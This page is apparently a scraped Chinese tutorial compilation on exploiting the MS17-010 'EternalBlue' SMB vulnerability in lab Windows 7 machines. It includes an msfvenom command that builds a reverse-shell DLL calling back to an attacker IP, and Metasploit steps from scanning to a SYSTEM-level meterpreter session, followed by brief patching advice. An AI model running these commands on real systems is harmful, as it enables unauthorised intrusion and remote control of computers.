ms17-010:利用“永恒之蓝”攻陷一台计算机

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ms17-010:利用“永恒之蓝”攻陷一台计算机相关的知识,希望对你有一定的参考价值。

参考技术A

我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈,可能还有些同学不幸中招,那么是什么原因导致了这款勒索病毒如此猖狂?

这件事情还得从一个黑客组织说起,这个组织叫做Equation Group(方程式组织),这一黑客团伙与美国国家安全局(NSA)的关系一直十分密切。而且外界也普遍认为,Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示,Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了目前绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。

然而,这个黑客组织被另一黑客团伙“The Shadow Brokers”(影子经纪人)给入侵了……(就是这么任性)。“The Shadow Brokers”(影子经纪人)自称他们从Equation Group手里拿到了很大一部分黑客工具,决定公开叫卖。

本以为能狠赚一笔,但实际上却没有人鸟他们,就是这么神奇。于是The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows 10以外,windows系列的系统无一能够幸免。

于是乎,永恒之蓝漏洞利用程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。

接下来,满足小白的好奇心,一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序,如何利用ms17-010攻陷一台64位windows 7。

攻击机1(192.168.1.101):
装有metasploit的linux
攻击机2(192.168.1.137):
可以运行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶机(192.168.1.140):
windows 7 x64(开放139、445端口)

利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机

修改后的路径与目录当前的路径一致

一路回车,直到输入项目名称处,输入项目名称

继续回车

继续一路回车,直到选择模式选择1

继续一路回车,直至攻击完成

相关命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回车,直到选择系统架构,由于我们要攻击的主机是win 7 x64位,故这里选择1

选择2 dll注入

Ps:喜欢的留个赞b( ̄▽ ̄)d ~也可以关注专题:黑客师。

永恒之蓝MS17-010漏洞利用

前言

永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

SMB(全称是Server Message Block) 是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

Metasploit Framework简介

MSF(The Metasploit Framework) msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的渗透测试工具。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。

MSF的设计初衷是打造成一个攻击工具开发平台,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

Metasploit简介-目录结构
kali-metasploit框架目录路径:/opt/metasploit-framework/embedded/framework//usr/share/metasploit-framework/

Metasploit简介-模块
1.Modules-msf核心:
用户用到的各种模块几乎都在这里,用户使用use这个msf这里时,就是用到了这个目录下的模块。这个目录下的文件在msfconsole启动时会被自动加载的,如果看到msfconsole启动时有出错信息但又能成功启动可以根据出错信息找解决方法,个人写的Module也可以放在这个目录下。

2.auxiliary:
辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)

3.exploits:
漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类

4.payloads:
攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码

5.post:
后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如提权等

6.evasion:
躲避模块,用来生成免杀payload

7.encoders:
编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测

8.nops:
由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(NOPS x90x90…)则会因为被拦截而导致攻击失效。

MSF使用参考:https://www.jianshu.com/p/1adbabecdcbd

MSF命令大全:https://www.cnblogs.com/MyGuazi/p/11871420.html

MS17-010漏洞利用

靶机win7企业版 ip:192.168.111.128
攻击机kali ip:192.168.111.130

我们先在控制台输入msfconsole 启动起来

用msf自带的db_nmap

db_nmap使用参数:
-sS: TCP SYN扫描
-sA: TCP ACK扫描 
-sT: TCP扫描
-A:打开操作系统探测和版本探测 
-T[O-5]:默认为T3,T4表示最大TCP扫描延迟为10ms

db_nmap无法使用参考:https://blog.csdn.net/xujing19920814/article/details/102809014

db_nmap -sS -T4 192.168.111.128 对目标机器SYN扫描

hosts:查看当前工作区所有主机
services:查看所有服务

发现开放了445端口那么后续就可以进行漏洞利用,使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞

show options 查看参数

设置攻击目标 set rhosts 192.168.111.128 run运行进行扫描

扫描结果:Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit) 说明可能存在MS17-010这个漏洞

搜索可使用的模块
search:搜索msf中相关模块
search platform:windows cve:2009 type:exploit

search ms17-010这个模块

这里我们选择ms17_010_eternalblue,use exploit/windows/smb/ms17_010_eternalblue

继续查看ms17_010_eternalblue这个模块的参数

设置攻击的ip地址 set rhosts 192.168.111.128 直接run开始攻击


攻击成功返回了一个meterpreter会话

直接就是系统权限不需要我们提权

安全修复方案

关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。
受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

中了勒索病毒可以尝试使用电脑管家的文档解密

以上是关于ms17-010:利用“永恒之蓝”攻陷一台计算机的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝MS17-010漏洞利用

永恒之蓝MS17-010漏洞利用

永恒之蓝MS17-010漏洞利用

MS17-010永恒之蓝漏洞利用

永恒之蓝MS17-010漏洞复现

MS17-010(永恒之蓝)漏洞复现和分析